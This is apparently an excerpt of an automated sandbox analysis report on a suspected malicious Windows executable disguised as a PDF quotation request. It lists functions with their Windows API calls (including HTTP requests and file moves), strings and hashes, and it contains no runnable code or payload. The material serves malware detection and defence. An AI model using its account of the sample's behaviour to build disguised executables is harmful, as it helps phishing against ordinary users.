                                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                    Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 0-1603158881
                                                                    • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                    • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                    • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                    • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                    Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateMenu.USER32 ref: 00448603
                                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                    • IsMenu.USER32(?), ref: 004486AB
                                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                    • String ID: 0
                                                                    • API String ID: 161812096-4108050209
                                                                    • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                    • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                    • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                    • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                    Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe), ref: 00434057
                                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                                    • _wprintf.LIBCMT ref: 004340A1
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                    • C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, xrefs: 00434040
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 3648134473-947574551
                                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                    • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                    Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4840fa41991d162a5c9db22f1b4940a4a00d4f74913dd36315ba2d65618f283d
                                                                    • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                    • Opcode Fuzzy Hash: 4840fa41991d162a5c9db22f1b4940a4a00d4f74913dd36315ba2d65618f283d
                                                                    • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                    Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                    • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                    • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                    • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                    Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,0040F545,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,004A90E8,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,?,0040F545), ref: 0041013C
                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 978794511-0
                                                                    • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                    • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                    • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                    • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                    Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                    • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                    • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                    • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                    Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                    • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                    • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                    • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                    Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_memcmp
                                                                    • String ID: '$\$h
                                                                    • API String ID: 2205784470-1303700344
                                                                    • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                    • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                    • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                    • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                    Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                    Strings
                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 2441338619-1568723262
                                                                    • Opcode ID: 03062464cd27d59e592a8cb1cb7b75f53b1fc5bd8b810ac523c951eeff495d56
                                                                    • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                    • Opcode Fuzzy Hash: 03062464cd27d59e592a8cb1cb7b75f53b1fc5bd8b810ac523c951eeff495d56
                                                                    • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                    Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                    • String ID: @COM_EVENTOBJ
                                                                    • API String ID: 327565842-2228938565
                                                                    • Opcode ID: 02a7cf746e7af3bb9dbcbb49c0257757b7d6ee221c5c5c84c5af0c819b853888
                                                                    • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                    • Opcode Fuzzy Hash: 02a7cf746e7af3bb9dbcbb49c0257757b7d6ee221c5c5c84c5af0c819b853888
                                                                    • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                    Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                    • String ID: H
                                                                    • API String ID: 3613100350-2852464175
                                                                    • Opcode ID: 6baba9221bf3346e1816a52ef7af72f7827635b041b7ba787fd1518cb8b20685
                                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                    • Opcode Fuzzy Hash: 6baba9221bf3346e1816a52ef7af72f7827635b041b7ba787fd1518cb8b20685
                                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                    Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 4174999648-3243417748
                                                                    • Opcode ID: 6e9120409e3492adb89672eb229e0eb1156b45b3b75482f07ba79714e92e1fba
                                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                    • Opcode Fuzzy Hash: 6e9120409e3492adb89672eb229e0eb1156b45b3b75482f07ba79714e92e1fba
                                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                    Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                      • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
